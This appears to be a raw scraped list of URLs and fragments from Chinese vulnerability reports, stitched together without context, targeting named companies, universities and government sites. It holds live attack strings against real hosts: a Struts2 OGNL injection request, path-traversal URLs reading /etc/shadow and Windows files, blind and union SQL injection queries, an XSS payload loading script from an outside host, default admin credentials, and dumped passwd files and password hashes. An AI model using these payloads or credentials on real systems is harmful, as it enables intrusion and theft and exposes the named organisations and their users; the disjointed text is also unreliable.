http://180.153.17.181:8080/itsm/login/index.action http://bbs.gionee.net/management http://183.60.42.157:28017/ inurl:Jhsoft.Web.login http://www.ccteboa.com/c6/Jhsoft.Web.login/AjaxForLogin.aspx http://218.17.227.196/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.originseed.com.cn/C6/Jhsoft.Web.login/AjaxForLogin.aspx//不跟随302跳转 http://www.xiyuefa.com:802/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.inofa.com/C6/Jhsoft.Web.login/AjaxForLogin.aspx 
http://oa.kanq.com.cn:808/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.guoxiang.com.cn/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://demos.jh0101.com/c6v32/Jhsoft.Web.login/AjaxForLogin.aspx https://arp.fjirsm.ac.cn/por/login_psw.csp http://**.**.**/ http://**.**.**/twiki/bin/view/Networkarchitecture/WebHome http://www.fjyajy.com/ http://openjira.deppon.com/ res.byd.cn/invoker/JMXInvokerServlet http://res.byd.cn/jbossws13/ jboss-4.2.3.GA/server/default/./deploy/jbossws13.war/jbossws13/]$ jboss-4.2.3.GA/server/default/./deploy/jbossws13.war/jbossws13/ jboss-4.2.3.GA/bin/]$ encap:Ethernet addr:10.9.33.87 Bcast:10.9.33.255 Mask:255.255.255.0 fe81:4d98/64 Scope:Link MTU:1500 packets:105179280 packets:16662536 txqueuelen:1000 https://nbs.byd.com.cn:8443/login.jsp https://nbs.byd.com.cn:8443/Login.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin 
rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin htt:x:100:103:IIIMF Htt:/usr/lib/im:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin gll:x:500:500::/home/gll:/bin/bash oracle:x:501:501::/home/oracle:/bin/bash encap:Ethernet CD:52:BE:93 addr:10.1.4.60 Bcast:10.1.4.255 Mask:255.255.255.0 cdff:fe52:be93/64 Scope:Link MTU:1500 packets:18430541 packets:13014913 txqueuelen:1000 http://club.bydauto.com.cn/ http://club.bydauto.com.cn/uc_server/admin.php?sid=5669w4yC%2BsSJl%2Bs5LhoULI7HztpSb3bCyr0QX%2FZt5nt8hkyg5Qb1wlNoCGggJ6Z6eM9p%2BHVatW%2FBFQ PHP:Linux http://www.bxt189.com/account/index http://hniec.net/newsshow.jsp?infoId=INFO0000003592 http://hniec.net/eos/login.jsp?type=student http://oa.inofa.com/C6/Jhsoft.Web.login/AjaxForLogin.aspx http://oa.inofa.com/ http://61.160.137.144/index.shtml http://61.160.137.144:80/sys/reviewImage.shtml?name=../../../../../../../../../../etc/shadow Zu8gzrvTx0av65aq:16135 lG:16135:0:99999:7 Qwy:16317:6:90:30 http://183.62.26.7/TPS/web/login.jsp http://oa8000.com,可以看到有个在线试用,然后点击进去,这里给我们提供了用户名和密码,只要登录就好了 http://wooyun.org/bugs/wooyun-2014-083670漏洞的修补不完善导致的。 http://123.101.1.162/javaapp/login.jsp 
http://60.217.226.35:8080/globeyes/index.jsp http://60.217.226.35:8080/globeyes/admin/index.jsp URL:http://zdh.nchu.edu.cn/admin/picupload.asp http://dbook.lib.pku.edu.cn/1.txt ftp://dbook.lib.pku.edu.cn/ http://www.shenhuafc.com.cn/ http://www.shenhuafc.com.cn/news_detail.php?newsId=5123 http://www.shenhuafc.com.cn/shenhuagl.php http://wooyun.org/bugs/wooyun-2010-078477 http://219.149.148.32/step1.jsp http://fans.51job.com/QVniqi http://admin.oa.ems.scjc.net.cn,该页面模仿的是exchange的页面风格,导致很多非技术类的用户信以为真。如图: http://apprl.apletsrye.cn.com/apple1.asp QQ:19006**20 http://sz.58.com/wangzhan/19578267944457x.shtml http://www.airzj.com/airzj/asp/jjt.asp http://www.airzj.com/airzj/asp/jjt_airport.asp http://www.hdhy.xm.gov.cn http://www.hdhy.xm.gov.cn/admin/index.asp http://www.hdhy.xm.gov.cn/upload_flash.asp?formname=addPro&editname=D_Path&uppath=down&filelx=doc http://www.hdhy.xm.gov.cn/upload_flash.asp?formname=addPro&editname=Pic_Path&uppath=down&filelx=jpg http://kf2.meizu.com/zdy_dbgg2.php?style_id=103301880&company_id=61397712&dbgg_type=2 comicinterfacetwo.asmx/GetProList http://202.41.245.3/liuyan/cjwt.jsp?CState=2 http://202.41.245.3/gonggao/newsview.jsp?id=801 http://202.41.245.3/liuyan/yhd.jsp?precolumn1=2 http://202.41.245.3/liuyan/yhd.jsp http://202.41.245.3/liuyan/cjwt.jsp?CState=2 http://art.nchu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=search%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 SQl:http://zjc.ccucm.edu.cn/index.php?m=Content&a=show&id=79 http://merchant.xkeshi.com/ http://sy.cxxy.seu.edu.cn/js/ShowXmCg.aspx?itemno=137 http://202.195.210.177/xkjs/ShowXmCg.aspx?itemno=137 http://218.90.212.43:9025/xkjs/ShowXmCg.aspx?itemno=137 http://sjjx.siso.edu.cn/jnjs/ShowXmCg.aspx?itemno=137 
http://202.195.237.148/xkjs/ShowXmCg.aspx?itemno=137 http://www.ysten.com/ http://www.haitiansoft.com:8080/ http://180.166.7.94/PowerSelect.asp?FieldValue= http://oa.tjfsu.edu.cn/PowerSelect.asp?FieldValue= http://www.fzsyxx.com/oa/PowerSelect.asp?FieldValue= http://vos.tjufe.edu.cn/PowerSelect.asp?FieldValue= http://www.shhjwl.com/vos/PowerSelect.asp?FieldValue= http://mail.gionee.com/m/index.action http://mail.gionee.com:8000/snspam/homepage.asp http://mail.gionee.com/css1.jsp http://www.samsoncn.com/product/Customers.aspx http://www.cphc.cn/news/Details.aspx?ShortName=default&NewsId=15 http://www.zgyygl.com/news/Details.aspx?ShortName=default&NewsId=15 http://www.cn-he.cn/News/Details.aspx?ShortName=default&NewsId=9 https://github.com/lewcok/APInerfacer/blob/b42f22aed3794cc7a327ecdcb4e60dd4cfe5396d/laifusiDataCenterQuartz/src/main/java/com/laifusi/datacenter/quartz/util/Email.java site:travelzen.com http://portal.wanhui.cn/ http://app.wanhui.cn/ http://app.wanhui.cn/downloadlink?r=http://www.baidu.com http://app.wanhui.cn/test/downloadlink?r=http://www.baidu.com http://www.wanda-cti.com/ www.wanda-cti.com/test.php http://car.yundasys.com:81/yd_khd/khd_add.php http://car.yundasys.com:81/yd_khd/可以猜到或者通过 http://car.yundasys.com:81/yd_khd/khd_list.php?lb=1&submit=查询 http://car.yundasys.com:81/yd_khd/ClientsPath/1.php https://github.com/houyafeng/myrepo/blob/f5dab1758190d0425df8bb09f6dc879de0630cbf/perl/tools/findtotle.pl https://github.com/guolin21/alarm/blob/1ce3bce545d9a667949b22f9ab9a41eee12e1748/mysite/filter/sendmail.py http://exmail.qq.com/login http://my.hupu.com/search?q=%27 http://pan.baidu.com/s/1s8Xm2,提取码:up8m,解压密码:wpspoc123。 http://www.tcfanggai.com/dongtai_display.php?id=101 http://ibook.12580life.com/bookList?searchtype=0&order=1&bookCategory=5 https://github.com/EducationAdministrationSystem/EducationAdministrationSystem/blob/2cc0ade40a1fa918d14015161e402cd047bec403/settings.py http://mail.dlut.edu.cn 
https://github.com/pprivulet/TrafficBureau/blob/17409bf70b6e3dcca2ae9ccd49fbbe512f282871/tb/src/com/tb/test/SendMail.java http://mail.tsari.tsinghua.edu.cn http://v2014.rccms.com/member/index.php?m=person_interview&show=works这个页面,删除面试通知处。 http://events.travelzen.com/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin hobbit:x:2002:2002::/home/hobbit:/bin/bash vincent:x:2003:2003::/home/vincent:/bin/bash cheung:x:2004:2004::/home/ch.cheung:/bin/bash 
danis:x:2005:2005::/home/danis:/bin/bash peng:x:2006:2006::/home/echo.peng:/bin/bash music:x:2007:2007::/home/music:/bin/bash tam:x:2008:2008::/home/ken.tam:/bin/bash sun:x:2009:2009::/home/harris.sun:/bin/bash yeung:x:2010:2010::/home/andy.yeung:/bin/bash chan:x:2011:2011::/home/beni.chan:/bin/bash chen:x:2012:2012::/home/tigra.chen:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin ibeatbeta:x:2013:2013::/home/ibeatbeta:/bin/bash zhou:x:2014:2014::/home/dianyi.zhou:/bin/bash http://store.hotel.tdxinfo.com/tops-front-purchaser-hotel/pur/order/hotel/orderView http://store.tdxinfo.com/tops-front-purchaser//additional/insurance/product/viewMainPage http://labs.chinamobile.com:80/ http://my.ecupl.edu.cn/main/loginIndex.do http://www.10106266.com/www.rar http://school.enetedu.com/AdminIndex/Login?type=sessionTimeOut http://uxss.sinaapp.com/ http://1.m4sktest.sinaapp.com/uxss/uxss1.html http://211.151.146.175:8080/login.do http://huanhua.nchu.edu.cn/downnews.asp?id=150 http://www.bcrj.com.cn/ http://210.30.190.28/ http://210.30.190.28 http://www.ztehome.com.cn/support/searchRsltTable.php?id=6 https://www.nauvpn.cn/por/login_psw.csp http://bkcms.fdsm.fudan.edu.cn/login.jsp http://buy.qd.sd.cn/login.php http://www.169jk.com:8088/App_Page/Reserve/ReserveHandler.ashx?Mode=userAuthorize&account=122331&password=123456 http://www.haitiansoft.com:8080/ http://oa.tjfsu.edu.cn/kaoQin/JiaoYanDis.asp?StartDate=1 http://www.fzsyxx.com/oa/kaoQin/JiaoYanDis.asp?StartDate=1 http://vos.tjufe.edu.cn/kaoQin/JiaoYanDis.asp?StartDate=1 http://www.shhjwl.com/vos/kaoQin/JiaoYanDis.asp?StartDate=1 http://121.30.226.44/kaoQin/JiaoYanDis.asp?StartDate=1 http://119.147.136.178:9080/login.action http://www.coastalbank.cn http://www.coastalbank.cn/bill.php?id=21 https://117.22.253.67/por/login_psw.csp http://www.dagexing.com/SearchWordManage_getAllSearchResult.do?stype=&page=0&searchWord=%3Cscript%20src%3Dhttp%3A%2f%2fxss.re%2f6532%3E%3C%2fscript%3E 
http://www.dagexing.com/SearchWordManage_getAllSearchResult.do?stype=&page=0&searchWord=%3Cscript%3Ealert%28String.fromCharCode%2888,%2083,%2083%29%29%3C/script%3E dawanjia.com/admin.php http://www.flyhigh.com.cn/admin.php?ctrl=admin&ac=adminUserUp&id= http://xheditor.com/img/xheditor-logo.gif/a.php https://github.com/jianjianni521/xuexibao/blob/e69b2d3377e2bb4196e3cf4c65379ac224ae2e3d/src/mail.properties https://github.com/david3424/rain/blob/94ba2c4b8f0996f38b82daa8874ba05f7660f8ac/bhhd/src/main/resources/config/spring-mail.xml http://b2b.tdxinfo.com/buyer/FrequentFlyerEditor.aspx?id=503189097&_=1416632585522 http://xmgl.fjkjt.gov.cn/p_itemsearch.pr.pr_itemsearch.do http://pic.lvmama.com/min/index.php?f=/min/config.php%00.css http://pic.lvmama.com/min/index.php?f=/min/index.php%00.css http://222.136.71.181/ http://old.tdxinfo.com/config/ http://gnjp.tdxinfo.com/download/ http://b2b.tdxinfo.com/buyer/systemmanage/DownLoad.aspx?filename=/attached/file/20131129/20131129144847_1447.doc http://b2b.tdxinfo.com/buyer/systemmanage/DownLoad.aspx?filename=c:/windows/system32/cmd.exe http://b2b.tdxinfo.com/ gnjp.tdxinfo.com/FrameWork/Register.aspx http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename= http://openapi.tdxinfo.com:8080/index.jsp# http://www.zsztb.gov.cn/PubNews/PubNewsView.aspx?parentclassid=01 http://www.metc.pku.edu.cn/dd.php?id=368 http://www.zhzyw.cc/zhzyw/nr/showinfo.php?dictid=28 http://58.222.221.130:93/ http://58.222.221.130:94/userManager/frmUserManager.aspx http://58.222.221.130:94/userManager/frmGroupManager.aspx http://58.222.221.130:8090/prelogin.action http://admin.uvip.cn/domain-admin/domainModify.net?IDDomain=11515742 http://60.174.37.244:8888/index!WCIndex.action http://60.174.37.244:8888 http://www.pfc.edu.cn/Awebsite/NewList.aspx?t=34 http://store.tdxinfo.com http://yibo.iyiyun.com/Index/adInfos/ad_id/393/size_id/10?_=1416641431861 http://yibo.iyiyun.com/Index/adInfos/ad_id/392/size_id/10?_=1416642150286 
http://ycxcb.gov.cn/picnews.asp?id=47 http://ycxcb.gov.cn/admin/admin_login.asp http://jz.dqjsj.gov.cn/type.asp?typeid=3 http://jz.dqjsj.gov.cn/admin/index.asp http://www.sysjtj.gov.cn/tzgg_nei.asp?n_id=507 http://www.sysjtj.gov.cn/admin_index.asp http://www.cengang.gov.cn/show_detail.asp?id=1610 http://www.cengang.gov.cn/admin/ http://www.ycxcb.gov.cn/picnews.asp?id=47 http://www.ycxcb.gov.cn/admin http://www.jzkfqaic.gov.cn/Article_Class2.asp?ClassID=5 http://www.jzkfqaic.gov.cn/admin_index.asp http://zfbz.10.gov.cn/list.asp?bigclassid=78 http://zfbz.10.gov.cn/admin/admin.asp http://tz.10.gov.cn/smalllist.asp?smallclassid=182 http://tz.10.gov.cn/admin/admin.asp http://220.180.15.170:28017 http://store.hotel.tdxinfo.com/tops-front-purchaser-hotel/pur/order/hotel/orderView http://www.sfdaic.org.cn http://www.sfdaic.org.cn/sfdaic/jsp/preview_1.jsp?TID=20141119143701193239900 http://www.ceic.ac.cn/history?start=%27&end=&weidu1=&weidu2=&jingdu1=&jingdu2=&height1=&height2=&zhenji1=&zhenji2=&sub=%E6%9F%A5%E8%AF%A2 http://data.weibo.com/report/analystarticle?id=2205075871 http://data.weibo.com/report/reportDetail?id=193 http://data.weibo.com/report/analystarticle?id=2131772313 http://www.sqlmap.org http://www.threeoa.com/product/ http://zjyiz.zje.net.cn/us/user/get_password_p.jsp http://united.soufun.com.tw/fckeditor/ditor/filemanager/browser/default/connectors/aspx/connector.aspx文件未删除,导致漏洞存在 http://united.soufun.com.tw/UserFiles/File/test.asp password:test http://ygb.ncu.edu.cn/yjsh/login.aspx http://ygb.ncu.edu.cn/yjsh/WebResource.axd?d=b99-7JT4MtcpmaC1IrbBKEZUVDsRrtRZk7G7d9E5iySTDSkF-f64urSQm6pJ3aIsmY_KScCXLOaMsd-ft6fR9YyMcf9Vo4VQCDcpI1Fr59Q1 http://ygb.ncu.edu.cn/yjsh/ScriptResource.axd http://ygb.ncu.edu.cn/yjsh/yjsh.rar http://jpkc.hustwb.edu.cn/dgdz/news_show.asp?id=207 http://jwc.hustwb.edu.cn/找到数据库后台phpmyadmin登陆,直接影响全部数据 http://b2b.tdxinfo.com//Buyer/BuyerUserEditor.aspx?id=500002110&_=1416664102998 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%201=2 
http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20exists%28select%20*%20from%20users%29 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20exists%28select%20username%20from%20users%29 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20exists%28select%20userpwd%20from%20users%29 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20len%28username%29%20from%20users%29=5 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20len%28userpwd%29%20from%20users%29=16 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20asc%28mid%28username,1,1%29%29%20from%20users%29=97 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20asc%28mid%28userpwd,1,1%29%29%20from%20users%29%3E50 http://www.ctthn.com/ygtd.asp?id=7&board_id=4%20and%20%28select%20top%201%20asc%28mid%28userpwd,1,1%29%29%20from%20users%29%3E51 http://nlbbs.9hgame.com/ http://nlbbs.9hgame.com Www.Evilys.Ml User:root@localhost user:root Table_pre:cdb http://www.ct10001.com.cn/alertnews.php?seqs=9 http://tnew.caijing.com.cn/ http://wooyun.org/test.js http://jnnews.jnu.edu.cn/qiandao/AttendList.asp?id=292 http://www.dixintong.com http://m.dixintong.com/activity.aspx?id=1322 http://yxzy.hrbmu.edu.cn:8080/cjxy/index.php http://yxzy.hrbmu.edu.cn:8080/cjxy/listPage.php?nt_id=2 http://www.zyzypc.com.cn/UserFiles/File/ali.asp http://admissions.shisu.edu.cn/zswweb/upload/base/ http://admissions.shisu.edu.cn/zswweb/upload/recommendation/ http://admissions.shisu.edu.cn/zswweb/upload/freshManInfo/ http://admissions.shisu.edu.cn/zswweb/base/.svn/ http://222.39.14.168/security,本来以为会有403这样的错误,,但是,,竟然网页目录直接呈现在我的眼前。。。这样连密码都不用了。。直接访问就OK www.ms-fda.gov.cn http://www.scmb.gov.cn/Article_Class.asp?ClassId=66 http://www.scmb.gov.cn/Admin_Index.asp ftp://112.126.126.29/ http://1.202.224.70:8080/ http://1.202.224.70:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml 
http://1.202.224.70:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://1.202.224.70:8080/resin-doc/examples/security-basic/viewfile?file=index.jsp http://java.sun.com/jsp/jstl/core http://1.202.224.21:8086/ http://1.202.224.21:8086 http://www.southsoft.com.cn/Case.asp?id=941 http://gsnfu.njfu.edu.cn/web_admin/main.aspx为例 http://1.202.224.78/ http://1.202.224.78 http://store.tdxinfo.com/tops-front-purchaser//divert/member/infoContainer http://b2b.tdxinfo.com http://ylht.tdxinfo.com/ gjjp.tdxinfo.com/static.tdxinfo.com/upload.tdxinfo.com http://61.133.221.210/ http://61.133.221.210/nzcms_list_news.asp?id=674&sort_id=658%0aand%0a1=2%0aunion%0aselect%0a1,username,3,4,5,6,7,8,9,10,11,12,13%0afrom%0anzcms_admin http://61.133.221.210/nzcms_list_news.asp?id=674&sort_id=658%0aand%0a1=2%0aunion%0aselect%0a1,userpassword,3,4,5,6,7,8,9,10,11,12,13%0afrom%0anzcms_admin http://61.133.221.210/nz0808/ http://222.35.36.235:9901/ http://118.123.221.110:8080/mobileportal/detailCommodity.do?commodityId=5d410841-b520-452e-92ca-c90050bd88e1 http://1.202.224.20/ http://app.xmsme.gov.cn/soft/softty/mainfrm.aspx www.ktvc8.com http://gnjp.tdxinfo.com/FrameWork/Login.aspx http://b.agent.fang.com/Magent/Agent/friendinfo/CooperationManger.aspx?action=del&SymbiosisId=1117 http://usercenter.12308.com/resetPwd/resetPwdByMobilePage.html http://usercenter.12308.com/resetPwd/resetPwdByMobileStep4Page.html url:http://www.aliued.com http://xxx.com/?author=1 http://xxx.com/?author=100 http://xxx.com/wp-login.php www.haust.edu.cn/article/detail.aspx?id=33 http://zxxx.yyedu.gov.cn http://www.aliued.cn这是阿里巴巴中国站的网站 http://xxx.cn/?author=1 http://xxx.cn/?author=100 http://www.aliued.cn/wp-login.php http://www.xjjygh.org.cn/details.aspx?id=3820 http://v2014.rccms.com/member/index.php?m=company_hirelist&show=hire&t=addform&id=1018 http://60.28.219.72/secure/Dashboard.jspa 
http://v2014.rccms.com/wap/?a=savevhire&wap http://v2014.rccms.com/wap/,然后选择发布微招聘 http://v2014.rccms.com https://github.com/cwenao/wedonation/blob/3db8e715b7abf516c93c2ce89b10d5ce77b22206/WebRoot/mobile/conationpay.jsp http://www.saclub.com.cn/searchGasPumpHist.do https://github.com/zhengzc/activitiTest/blob/e768cc3e0a9d0b682aaf08a36264e02b71d360a1/src/main/resources/spring/applicationContext.xml http://mail.travelzen.com/ http://60.217.226.35:8080/globeyes/index.jsp,如图所示: https://github.com/duanshuaimin/zyyt/blob/70eb1010ab18118fd8940e9be2e928ccc58e6170/MobileActiveCheck.py https://3g.*****cn:1445/msp.do http://manager.17k.com/menu.html http://manager.17k.com/test/goModifyBookAuthLevelDate.action http://manager.17k.com/liansai/queryLiansaiInfo.action http://manager.17k.com/liansai/queryTutorListByZoneStatus.action http://manager.17k.com/liansai/modifyLastWin.action http://manager.17k.com/liansai/findGameTeamMsg.action http://211.160.21.136/ http://rcc086.com/userlogin.action http://www.digilink086.com/userlogin.action http://tx.dgis.cn/txbz.action?type=1 http://cs.dgis.cn/txbz.action?type=1 http://www.ikamobile.cn/ http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename=C:/Windows/System32/drivers/etc/hosts http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename=c:\Windows\win.ini http://b2b.tdxinfo.com/Buyer/Notice.aspx?id=140a&fid=NCG50000 http://b2b.tdxinfo.com/Buyer/SystemManage/DownLoad.aspx?filename=E:\supper_oa1\crm\web.config http://*********com"/ http://*********am"/ http://*********/byc-insurance/insure/chinapnrNotify.shtml"/ http://2*********3/byc-oth/insure.shtml"/ http:/**********tml http://203**********y.shtml http://19**********?action=refund http://**********Alipay_Return.aspx http://********************spx http:/**********PNR/ChinaPNR_Notify.aspx http://**********_Return.aspx http://**********Refund_Notify.aspx http:/*******pic.shtml"/ http://mail.10106266.com/admin/ http://jdht.tdxinfo.com/可以查酒店订单 
http://ylht.tdxinfo.com/basedata/Template.aspx也可以操作 www.fjccl.com www.clinet.com.cn www.gdccl.com.cn www.nccl.cn www.caclm.org.cn www.jsccl.com http://mini.renren.com/manage/index.jsp http://60.2.247.134/ http://116.228.55.142:7006/permerchant/ http://oms.haier.com/omsframe/security/loginInit.action http://www.sciclife.com/manage/content/docmanage/download.jsp?filePath=/bxxz/renshenbaoxiantoubaotishishu.pdf http://www.sciclife.com/manage/content/docmanage/download.jsp?filePath=/bxxz/../../content/docmanage/download.jsp http://www.sciclife.com/manage/content/docmanage/download.jsp?filePath=/bxxz/../../../../../etc/passwd http://www.yichengpin.com www.yichengpin.com http://www.yichengpin.com http://www.yichengpin.com/order/order-myOrderPackageDetail-8801-1.do http://www.yichengpin.com/order/order-myOrderPackageDetail-5000-1.do http://xscxjy.suda.edu.cn/PersonInfo/ShowAnswer.aspx?UserScoreID=701”最后的ID,即可直接获取到任意人员的错误报告,然后通过页面html代码的分析,即可把题目抓取出来,最后生成题库。 http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=hire_search&id=2&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2%20and%201=0&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2%20and%201=1&d=down http://v2014.rccms.com/mobile/index.php?m=search&a=resume_search&id=2%20and%201=@`%27`%20and%201.union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13%23%27&d=down android:label="@string/create_pass_title android:name="com.yulong.android.createpassword.CreateSecurityPasswordStep2Activity android:screenOrientation="nosensor"/ http://tg.gmw.cn http://ac.cnas.org.cn/cnas/jsp/login.jsp http://store.tdxinfo.com/tops-front-purchaser/facade/signin http://218.247.254.125/src/acloglogin.php http://sh.cltt.org/Web/Login/pscp01001.aspx http://www.bjgjj.gov.cn/wsyw/wscx/gjj_cx.jsp?grdjhh=XXX&gjjzh=YYY&vnv=ZZZ&lx=0 
https://vpn1.ahmu.edu.cn/prx/000/http/localhost/login content://com.yulong.android.ntfcationmanager.provider/ntfpkgperm http://bgy.ata.net.cn/CUST01hgkw/ http://app.weixin.gzuni.com/z/liantong/order/selectedtel?agency_id=&gid=16&taocanid= http://app.weixin.gzuni.com/z/liantong/order/selectedtel?agency_id=&gid=16&taocanid= http://app.weixin.gzuni.com/z/liantong/order/noiphone?agency_id=&gid=16 https://202.121.96.148/prx/000/http/localhost/login https://202.120.144.88/prx/000/http/localhost/login http://183.221.33.4/进入得知弱口令(用户:useradmin密码:venus.user),进去发现遂是一防火墙也,然,可控之。 http://app.weixin.gzuni.com/z/liantong/order/free?gid=49&agency_id=00002 http://epay.woigz.cn/z/liantong/order/view?agency_id=00002&order_num=WD2014112416445768 https://bx.baosteel.com/prx/000/http/localhost/login http://www.hvri.ac.cn/showperson.aspx?id=19 http://drops.wooyun.org/papers/2893) android:show_fragment=com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment;B.confirm_credentials=false;launchFlags=0x00008000;SEL;action=android.settings.SETTINGS;end http://app.weixin.gzuni.com/z/liantong/order/noiphone?gid=62&agency_id= http://epay.woigz.cn/epay/consignee.php?gid=62&agency_id=&taocanid=174&packageid=350&monthid=0 http://epay.woigz.cn//z/liantong/order/view?agency_id=00002&order_num=WD2014112417045482 url:http://61.174.213.251:8088/manager/html user:admin pass:admin http://app.weixin.gzuni.com/z/liantong/order/noiphone?gid=53&agency_id=00001 http://222.73.72.49/site/index http://demo1.zving.com/ http://echo.kibey.com/member/setting http://www.kibey.com/system/setting http://61.130.248.206:8088/ltmst/manager/index.jsp url:http://61.130.248.206:8088/manager/html user:admin http://www.gd10198.com.cn/index.php?mod=member http://oa.crcc.cn/ztjinweb/netpage.nsf/frmmainpage?open http://home.gmw.cn/index.php http://www.xinzhihr.com/admin/link.asp http://www.xinzhihr.com/group1.asp?flag=&nwww.xinzhihr.com/rlgc_show.asp?flag=&j_id=651 www.xinzhihr.com/rlgc_show.asp?flag=&j_id=651 
